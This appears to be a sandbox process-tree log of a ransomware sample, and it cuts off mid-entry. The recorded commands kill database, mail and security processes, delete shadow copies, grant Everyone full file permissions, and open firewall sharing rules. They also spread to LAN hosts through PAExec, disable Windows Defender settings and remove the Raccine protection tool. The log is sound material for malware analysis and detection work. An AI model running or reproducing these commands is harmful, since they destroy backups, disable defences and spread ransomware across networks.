- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:3312
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:5052
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  PID:4632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:4252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:2420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  PID:4668
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:4020
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:2500
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  PID:764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  PID:4404
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:2604
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4896
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:2212
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:4280
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  PID:1928
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:4736
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:3788
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:4832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  PID:4640
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:4984
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  PID:2884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  PID:4732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  PID:5016
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:2988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  PID:3512
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  PID:2656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  PID:4208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:4604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:904
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCBA2.bat
  2⤵
  PID:4476
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:4156
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:3120
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
    3⤵
    PID:4168
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4132
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
    3⤵
    PID:4264
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:4152
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
    3⤵
    PID:2504
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3752
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4876
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4516
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4064
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4000
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4668
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4800
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1072
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3800
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1596
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.33 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:2104
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:1116
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.16 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:5084
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.14 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:4892
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4396
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.15 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:4440
- C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe
  "C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:4844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5768
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5816
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5664
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5584
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4960
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1160
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5268
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:1616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4476

C:\Windows\PAExec-4532-RJMQBVDN.exe
C:\Windows\PAExec-4532-RJMQBVDN.exe -service
1⤵
PID:4684
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:4624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:4240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:4156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:2144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:5104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5352
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:5560
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5716
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:5780
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:5852
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5912
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5960
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5932
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5920
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:6072
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:6096
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6064
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5156
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4836
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5048
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:4652
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:5592
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:5648
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:5856
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:6092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:6136
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4172
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4436
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:5560
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:5412
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:5504
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:4824
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:4680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5576
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:4424
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:4668
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4204
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:4472
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:5012
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:6060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:5424
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:5800
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:4492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5724
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:5756
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:5740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:5168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:2876
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:5976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:5992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4072
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:6088
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:6104
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:5912
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    PID:5060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:4496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    PID:3192
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    - Kills process with taskkill
    PID:4308
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:4144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    PID:4184
- - C:\Windows\system32\taskkill.exe
